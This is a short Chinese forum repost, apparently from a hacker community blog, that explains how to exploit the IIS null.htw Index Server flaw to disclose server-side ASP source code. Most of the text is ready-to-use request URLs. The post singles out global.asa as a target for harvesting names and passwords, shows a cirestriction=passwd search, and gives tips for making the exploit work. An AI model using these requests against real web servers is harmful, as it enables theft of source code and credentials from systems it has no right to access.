林海工作室 IOHY 论坛

版权声明：转载时请以超链接形式标明文章原始出处和作者信息及本声明
http://qq4508509.yourblog.org/logs/147485.html

------------------------------------------------------------------------------- 查查null.htw都会得到这些内容 http://ip/null.htw?ciwebhitsfile=/login.asp%20&cirestriction=""&cihilitetype=full /login.asp 从/开始算起 eg: www.xxx.com/a/a.asp 那就把/login.asp改成/a/a.asp http://ip/null.htw?ciwebhitsfile=/a.asp%20&cirestriction=""&cihilitetype=full http://ip/null.htw?ciwebhitsfile=/Global.asa%20&cirestriction=""&cihilitetype=full 由于这个漏洞null.htw最大能力也就是泄露源代码 所以最好运用就是泄露global.asa文件,此文件往往带着名字,密码等重要内容. 讲解一下:null.htw 调用了ciwebhitsfile,cirestriction,cihilitetype 处理.其中 ciwebhitsfile 处理文件 cirestriction 查找信息 cihilitetype 格式 (***个人理解^_^***) 上面我们已经了解了 ciwebhitsfile 处理文件应用 下面我们再说说cirestriction运用^_^ 相信很多人都不了解这有什嘛用.其实就是懒人用的(像我就是了)^_^ http://ip/null.htw?ciwebhitsfile=/Global.asa%20&cirestriction=passwd&cihilitetype=full cirestriction=passwd (从=后面开始) 这样它就会在global.asa查找passwd(有找到会有连接哦^_^) 其实这篇并没有什嘛新技术,但实际操作的确可用. 并稍微讲解了一下ciwebhitsfile cirestriction cihilitetype,便于新手理解.其中请注意了 新手往往省列掉%20,就是说在/*.asp后cirestriction前必须加上%20 http://ip/null.htw?ciwebhitsfile=/Global.asa%20&cirestriction=""&cihilitetype=full 如果没有这%20,那嘛只能返回html的源代码,asp就无法显示了^_^